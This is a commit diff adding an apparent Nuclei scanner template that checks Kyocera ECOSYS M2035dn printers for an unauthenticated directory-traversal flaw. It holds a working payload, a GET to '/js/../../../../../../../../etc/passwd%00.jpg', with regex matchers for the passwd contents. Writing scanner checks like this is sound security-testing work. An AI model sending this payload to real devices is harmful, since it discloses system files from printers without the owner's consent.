Create kyocera-rx-ecosys-m2035dn-lfi.yaml
parent
3b86b8839e
commit
36c90b1358
|
@ -0,0 +1,27 @@
|
|||
id: kyocera-rx-ecosys-m2035dn-lfi
|
||||
|
||||
info:
|
||||
name: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50738
|
||||
- https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html
|
||||
tags: printer,iot,kyocera,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/js/../../../../../../../../etc/passwd%00.jpg"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue